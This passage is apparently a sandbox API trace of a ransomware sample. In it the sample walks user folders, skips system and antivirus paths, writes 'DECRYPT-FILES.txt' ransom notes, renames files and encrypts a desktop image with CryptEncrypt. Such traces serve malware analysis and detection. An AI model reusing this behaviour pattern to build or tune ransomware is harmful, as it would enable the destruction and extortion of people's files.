returned="DeleteTimerQueue" [0082.804] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0082.804] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0082.804] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0082.804] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0082.804] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0082.804] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0082.804] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0082.804] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0082.804] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0082.804] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0082.804] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0082.804] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0082.804] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0082.804] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0082.804] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0082.804] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0082.804] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0082.804] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0082.804] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0082.804] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0082.804] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0082.804] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0082.805] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0082.805] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0082.805] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0082.805] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0082.805] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0082.805] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0082.805] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0082.805] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0082.805] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0082.805] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0082.805] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0082.805] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0082.805] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0082.805] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0082.805] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0082.805] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0082.805] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0082.805] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0082.805] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0082.805] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0082.805] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0082.805] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0082.805] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0082.805] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0082.805] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0082.805] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0082.805] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0082.805] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0082.805] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0082.805] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0082.805] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0082.805] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0082.805] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0082.805] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0082.805] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0082.806] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0082.806] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0082.806] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0082.806] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0082.806] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0082.806] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0082.806] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0082.806] lstrcpyW (in: lpString1=0x10d0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0082.806] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\sikvnb huvuib.contact") returned 60 [0082.806] wsprintfW (in: param_1=0x3f2e120, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\sikvnb huvuib.contact.U5MLwHG") returned 68 [0082.806] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\sikvnb huvuib.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\sikvnb huvuib.contact"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\sikvnb huvuib.contact.U5MLwHG" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\sikvnb huvuib.contact.u5mlwhg"), dwFlags=0x0) returned 1 [0082.807] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.807] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.807] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.807] FindNextFileW (in: hFindFile=0x5f8b98, lpFindFileData=0x3f2f150 | out: lpFindFileData=0x3f2f150*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eaf1340, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaf1340, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x494, dwReserved0=0x0, dwReserved1=0x0, cFileName="sikvnb huvuib.contact", cAlternateFileName="SIKVNB~1.CON")) returned 0 [0082.807] FindClose (in: hFindFile=0x5f8b98 | out: hFindFile=0x5f8b98) returned 1 [0082.807] CloseHandle (hObject=0x430) returned 1 [0082.807] FindNextFileW (in: hFindFile=0x5f8c18, lpFindFileData=0x3f2f3cc | out: lpFindFileData=0x3f2f3cc*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29103b60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29103b60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29103b60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Cookies", cAlternateFileName="")) returned 1 [0082.807] lstrcmpW (lpString1="Cookies", lpString2=".") returned 1 [0082.808] lstrcmpW (lpString1="Cookies", lpString2="..") returned 1 [0082.808] lstrcatW (in: lpString1="Cookies", lpString2="\\" | out: lpString1="Cookies\\") returned="Cookies\\" [0082.808] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpString2="Cookies\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\" [0082.808] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\", lpSrch="\\Program Files") returned 0x0 [0082.808] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\", lpSrch=":\\Windows") returned 0x0 [0082.808] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\", lpSrch="\\Games\\") returned 0x0 [0082.808] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\", lpSrch="\\Tor Browser\\") returned 0x0 [0082.808] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\", lpSrch="\\ProgramData\\") returned 0x0 [0082.808] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0082.808] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0082.808] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0082.808] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\", lpSrch="\\All Users") returned 0x0 [0082.808] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\", lpSrch="\\IETldCache\\") returned 0x0 [0082.808] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\", lpSrch="\\Local Settings\\") returned 0x0 [0082.808] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\", lpSrch="\\AppData\\Local") returned 0x0 [0082.808] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\", lpSrch="AhnLab") returned 0x0 [0082.808] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0082.808] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\") returned 38 [0082.808] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0082.808] wsprintfW (in: param_1=0x3f2e930, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\\\jkbimi8.tmp") returned 50 [0082.808] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\cookies\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x430 [0082.809] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\") returned 38 [0082.809] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0082.809] wsprintfW (in: param_1=0x3f2e930, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\\\DECRYPT-FILES.txt") returned 56 [0082.809] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\cookies\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0082.809] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\") returned 38 [0082.809] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\*" [0082.809] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\*", lpFindFileData=0x3f2f150 | out: lpFindFileData=0x3f2f150*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eaf1340, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaf1340, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x494, dwReserved0=0x0, dwReserved1=0x0, cFileName="sikvnb huvuib.contact", cAlternateFileName="苟盅꬈썮ϲ")) returned 0xffffffff [0082.809] CloseHandle (hObject=0x430) returned 1 [0082.809] FindNextFileW (in: hFindFile=0x5f8c18, lpFindFileData=0x3f2f3cc | out: lpFindFileData=0x3f2f3cc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa9d5a6e0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xa9d5a6e0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa9d5a6e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0082.809] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0082.810] FindNextFileW (in: hFindFile=0x5f8c18, lpFindFileData=0x3f2f3cc | out: lpFindFileData=0x3f2f3cc*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x8bc0e070, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0x8bc0e070, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 1 [0082.810] lstrcmpW (lpString1="Desktop", lpString2=".") returned 1 [0082.810] lstrcmpW (lpString1="Desktop", lpString2="..") returned 1 [0082.810] lstrcatW (in: lpString1="Desktop", lpString2="\\" | out: lpString1="Desktop\\") returned="Desktop\\" [0082.810] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpString2="Desktop\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" [0082.810] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpSrch="\\Program Files") returned 0x0 [0082.810] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpSrch=":\\Windows") returned 0x0 [0082.810] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpSrch="\\Games\\") returned 0x0 [0082.810] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpSrch="\\Tor Browser\\") returned 0x0 [0082.810] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpSrch="\\ProgramData\\") returned 0x0 [0082.810] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0082.810] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0082.810] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0082.810] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpSrch="\\All Users") returned 0x0 [0082.810] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpSrch="\\IETldCache\\") returned 0x0 [0082.810] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpSrch="\\Local Settings\\") returned 0x0 [0082.810] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpSrch="\\AppData\\Local") returned 0x0 [0082.810] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpSrch="AhnLab") returned 0x0 [0082.810] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0082.810] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned 38 [0082.810] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0082.810] wsprintfW (in: param_1=0x3f2e930, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\\\jkbimi8.tmp") returned 50 [0082.810] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x430 [0082.811] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned 38 [0082.811] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0082.811] wsprintfW (in: param_1=0x3f2e930, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\\\DECRYPT-FILES.txt") returned 56 [0082.811] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x434 [0082.811] WriteFile (in: hFile=0x434, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2e92c, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2e92c*=0x23fc, lpOverlapped=0x0) returned 1 [0082.812] CloseHandle (hObject=0x434) returned 1 [0082.812] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned 38 [0082.812] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*" [0082.812] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*", lpFindFileData=0x3f2f150 | out: lpFindFileData=0x3f2f150*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xad8dcce0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xad8dcce0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5f8b98 [0082.813] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0082.813] FindNextFileW (in: hFindFile=0x5f8b98, lpFindFileData=0x3f2f150 | out: lpFindFileData=0x3f2f150*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xad8dcce0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xad8dcce0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0082.813] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0082.813] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0082.813] FindNextFileW (in: hFindFile=0x5f8b98, lpFindFileData=0x3f2f150 | out: lpFindFileData=0x3f2f150*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7ee17a70, ftCreationTime.dwHighDateTime=0x1d4cf4b, ftLastAccessTime.dwLowDateTime=0xdd80fd50, ftLastAccessTime.dwHighDateTime=0x1d4c5f3, ftLastWriteTime.dwLowDateTime=0xdd80fd50, ftLastWriteTime.dwHighDateTime=0x1d4c5f3, nFileSizeHigh=0x0, nFileSizeLow=0x92a1, dwReserved0=0x0, dwReserved1=0x0, cFileName="127zrfgdW9q5BqzyAa.png", cAlternateFileName="127ZRF~1.PNG")) returned 1 [0082.813] lstrcmpiW (lpString1="127zrfgdW9q5BqzyAa.png", lpString2="DECRYPT-FILES.txt") returned -1 [0082.813] lstrcmpiW (lpString1="127zrfgdW9q5BqzyAa.png", lpString2="autorun.inf") returned -1 [0082.813] lstrcmpiW (lpString1="127zrfgdW9q5BqzyAa.png", lpString2="boot.ini") returned -1 [0082.813] lstrcmpiW (lpString1="127zrfgdW9q5BqzyAa.png", lpString2="desktop.ini") returned -1 [0082.813] lstrcmpiW (lpString1="127zrfgdW9q5BqzyAa.png", lpString2="ntuser.dat") returned -1 [0082.813] lstrcmpiW (lpString1="127zrfgdW9q5BqzyAa.png", lpString2="iconcache.db") returned -1 [0082.813] lstrcmpiW (lpString1="127zrfgdW9q5BqzyAa.png", lpString2="bootsect.bak") returned -1 [0082.813] lstrcmpiW (lpString1="127zrfgdW9q5BqzyAa.png", lpString2="ntuser.dat.log") returned -1 [0082.813] lstrcmpiW (lpString1="127zrfgdW9q5BqzyAa.png", lpString2="thumbs.db") returned -1 [0082.813] lstrcmpiW (lpString1="127zrfgdW9q5BqzyAa.png", lpString2="Bootfont.bin") returned -1 [0082.813] lstrlenW (lpString="127zrfgdW9q5BqzyAa.png") returned 22 [0082.813] lstrcmpiW (lpString1="png", lpString2="lnk") returned 1 [0082.813] lstrcmpiW (lpString1="png", lpString2="exe") returned 1 [0082.813] lstrcmpiW (lpString1="png", lpString2="sys") returned -1 [0082.813] lstrcmpiW (lpString1="png", lpString2="dll") returned 1 [0082.813] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned 38 [0082.813] lstrlenW (lpString="127zrfgdW9q5BqzyAa.png") returned 22 [0082.813] lstrcpyW (in: lpString1=0x3f2e920, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" [0082.813] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpString2="127zrfgdW9q5BqzyAa.png" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\127zrfgdW9q5BqzyAa.png") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\127zrfgdW9q5BqzyAa.png" [0082.813] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0082.813] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\127zrfgdW9q5BqzyAa.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\127zrfgdw9q5bqzyaa.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x438 [0082.814] GetFileSizeEx (in: hFile=0x438, lpFileSize=0x3f2e0e8 | out: lpFileSize=0x3f2e0e8*=37537) returned 1 [0082.814] CreateFileMappingW (hFile=0x438, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x43c [0082.814] MapViewOfFile (hFileMappingObject=0x43c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfc0000 [0082.814] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xfb0000 | out: pbBuffer=0xfb0000) returned 1 [0082.814] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xfb0020 | out: pbBuffer=0xfb0020) returned 1 [0082.814] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0082.814] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x10d0000*, pdwDataLen=0x3f2e050*=0x28, dwBufLen=0x100 | out: pbData=0x10d0000*, pdwDataLen=0x3f2e050*=0x100) returned 1 [0082.814] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x10e0000 [0082.815] VirtualFree (lpAddress=0x10e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.816] UnmapViewOfFile (lpBaseAddress=0xfc0000) returned 1 [0082.816] CloseHandle (hObject=0x43c) returned 1 [0082.816] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0082.816] WriteFile (in: hFile=0x438, lpBuffer=0x10d0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2e070, lpOverlapped=0x0 | out: lpBuffer=0x10d0000*, lpNumberOfBytesWritten=0x3f2e070*=0x108, 